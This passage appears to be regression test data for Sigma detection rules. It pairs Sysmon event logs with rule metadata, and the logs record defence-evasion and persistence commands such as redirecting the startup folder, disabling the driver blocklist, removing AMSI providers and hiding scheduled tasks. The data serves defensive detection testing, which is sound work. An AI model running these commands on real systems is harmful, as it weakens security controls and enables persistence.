    "path": "regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-01-05T06:59:26.079827Z\"\n        }\n      },\n      \"EventRecordID\": 75087,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3636,\n          \"ThreadID\": 4340\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-01-05 06:59:26.059\",\n      \"ProcessGuid\": \"0197231E-614E-695B-DC0C-000000000C00\",\n      \"ProcessId\": 11680,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\reg.exe\\\" add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\" /v \\\"Common Startup\\\" /t REG_SZ /d C:\\\\Test\\\\calc.exe /f\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\Sysmon\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-70FA-694F-AED1-150000000000\",\n      \"LogonId\": \"0x15d1ae\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-7211-694F-D001-000000000C00\",\n      \"ParentProcessId\": 9524,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"ParentCommandLine\": \"powershell  -ep bypass\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml",
    "content": "id: 60dc10cf-d9d5-4e64-897f-90b9074def8f\ndescription: N/A\ndate: 2026-01-05\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\n      title: User Shell Folders Registry Modification via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-23T02:16:46.810517Z\"\n        }\n      },\n      \"EventRecordID\": 90849,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3320,\n          \"ThreadID\": 4216\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-23 02:16:46.792\",\n      \"ProcessGuid\": \"0197231E-FB8E-6949-2610-000000000D00\",\n      \"ProcessId\": 25368,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\reg.exe\",\n      \"FileVersion\": \"10.0.26100.5074 (WinBuild.160101.0800)\",\n      \"Description\": \"Registry Console Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"reg.exe\",\n      \"CommandLine\": \"reg  add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\CI\\\\Config\\\" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 00000000 /f\",\n      \"CurrentDirectory\": \"C:\\\\Windows\\\\System32\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-5032-6940-AAE2-070000000000\",\n      \"LogonId\": \"0x7e2aa\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0\",\n      \"ParentProcessGuid\": \"0197231E-FB8C-6949-2310-000000000D00\",\n      \"ParentProcessId\": 22176,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml",
    "content": "id: eca9f987-800a-4b32-92ec-2d50a0a120a0\ndescription: N/A\ndate: 2025-12-23\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 22154f0e-5132-4a54-aa78-cc62f6def531\n      title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-11-27T08:12:45.186674Z\"\n        }\n      },\n      \"EventRecordID\": 733879,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3544,\n          \"ThreadID\": 4264\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-11-27 08:12:45.183\",\n      \"ProcessGuid\": \"0197231E-07FD-6928-2A0C-000000000D00\",\n      \"ProcessId\": 3532,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n      \"FileVersion\": \"10.0.26100.7019 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Fault Reporting\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"WerFaultSecure.exe\",\n      \"CommandLine\": \"C:\\\\Windows\\\\System32\\\\WerFaultSecure.exe /h /pid 3472 /tid 3476 /encfile 304 /cancel 364 /type 268310\",\n      \"CurrentDirectory\": \"C:\\\\WINDOWS\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-B736-6923-B25C-3B0000000000\",\n      \"LogonId\": \"0x3b5cb2\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=9521BDCD891789724786BDCB9C9468A06818EDDC,MD5=C5A2014C3BC84EDCEEF5185AEA3BB5E0,SHA256=1C60BA5771201F7AEE44DCA30CBCBF78F6E3C39F30AD0A5C6C7BC8137A475EAA,IMPHASH=79E7A5E4F18B29329345D2098E1B95EB\",\n      \"ParentProcessGuid\": \"0197231E-07FD-6928-290C-000000000D00\",\n      \"ParentProcessId\": 9388,\n      \"ParentImage\": \"C:\\\\Users\\\\xodih\\\\Downloads\\\\EDRFreeze-gnu.exe\",\n      \"ParentCommandLine\": \"EDRFreeze-gnu.exe  3472 10000\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml",
    "content": "id: 68010a5c-f8bf-4a2c-8cd0-038d4009805e\ndescription: N/A\ndate: 2025-11-27\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2\n      title: PPL Tampering Via WerFaultSecure\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-26T19:24:05.918776Z\"\n        }\n      },\n      \"EventRecordID\": 18298,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3484,\n          \"ThreadID\": 3424\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-12-26 19:24:05.918\",\n      \"ProcessGuid\": \"0197231E-E0D5-694E-3803-000000000A00\",\n      \"ProcessId\": 11088,\n      \"Image\": \"C:\\\\WINDOWS\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\DeviceGuard\\\\RequirePlatformSecurityFeatures\",\n      \"User\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml",
    "content": "id: 2e3725ae-2eaa-48a2-9d9b-4a7d55a75974\ndescription: N/A\ndate: 2025-12-26\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d645ef86-2396-48a1-a2b6-b629ca3f57ff\n      title: Windows Credential Guard Related Registry Value Deleted - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T00:11:12.880834Z\"\n        }\n      },\n      \"EventRecordID\": 16786799,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteKey\",\n      \"UtcTime\": \"2025-10-26 00:11:12.865\",\n      \"ProcessGuid\": \"5AA13A44-6720-68FD-3E3F-000000004002\",\n      \"ProcessId\": 6016,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml",
    "content": "id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 41d1058a-aea7-4952-9293-29eaaf516465\n      title: Removal Of AMSI Provider Registry Keys\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:56:57.832430Z\"\n        }\n      },\n      \"EventRecordID\": 111828,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteKey\",\n      \"UtcTime\": \"2025-10-24 23:56:57.828\",\n      \"ProcessGuid\": \"5AA13A44-1246-68FC-781E-000000004002\",\n      \"ProcessId\": 9880,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml",
    "content": "id: 3c0a5ddd-6241-4b52-9718-b12920e082ef\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\n      title: RunMRU Registry Key Deletion - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T00:01:59.334619Z\"\n        }\n      },\n      \"EventRecordID\": 156421,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-10-25 00:01:59.330\",\n      \"ProcessGuid\": \"5AA13A44-1377-68FC-A61E-000000004002\",\n      \"ProcessId\": 5160,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\MaliciousTask\\\\Index\",\n      \"User\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml",
    "content": "id: f3670cef-9f21-4a86-901b-c28c285f3b52\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      title: Removal Of Index Value to Hide Schedule Task - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 12,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 12,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T00:01:54.872810Z\"\n        }\n      },\n      \"EventRecordID\": 155709,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"DeleteValue\",\n      \"UtcTime\": \"2025-10-25 00:01:54.861\",\n      \"ProcessGuid\": \"5AA13A44-1372-68FC-A51E-000000004002\",\n      \"ProcessId\": 7008,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\MaliciousTask\\\\SD\",\n      \"User\": \"NT AUTHORITY\\\\SYSTEM\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml",
    "content": "id: b796fd1e-a03a-4db8-a072-c597b6e0da1b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      title: Removal Of SD Value to Hide Schedule Task - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2020-12-18T17:56:07.017817Z\"\n        }\n      },\n      \"EventRecordID\": 596571,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3552,\n          \"ThreadID\": 5004\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"MSEDGEWIN10\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"Hidden Local Account Created\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2020-12-18 17:56:07.015\",\n      \"ProcessGuid\": \"747F3D96-68DD-5FDD-0000-00101B660000\",\n      \"ProcessId\": 648,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\lsass.exe\",\n      \"TargetObject\": \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\hideme0007$\\\\(Default)\",\n      \"Details\": \"Binary Data\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml",
    "content": "id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 460479f3-80b7-42da-9c43-2cc1d54dbccd\n      title: Creation of a Local Hidden User Account by Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:28:03.064387Z\"\n        }\n      },\n      \"EventRecordID\": 27517409,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 17:28:03.060\",\n      \"ProcessGuid\": \"5AA13A44-5A23-68FE-2155-000000004002\",\n      \"ProcessId\": 4400,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\AtomicSafeMode\\\\(Default)\",\n      \"Details\": \"Service\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml",
    "content": "id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 1547e27c-3974-43e2-a7d7-7f484fb928ec\n      title: Registry Persistence via Service in Safe Mode\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T17:33:36.133400Z\"\n        }\n      },\n      \"EventRecordID\": 27619790,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": 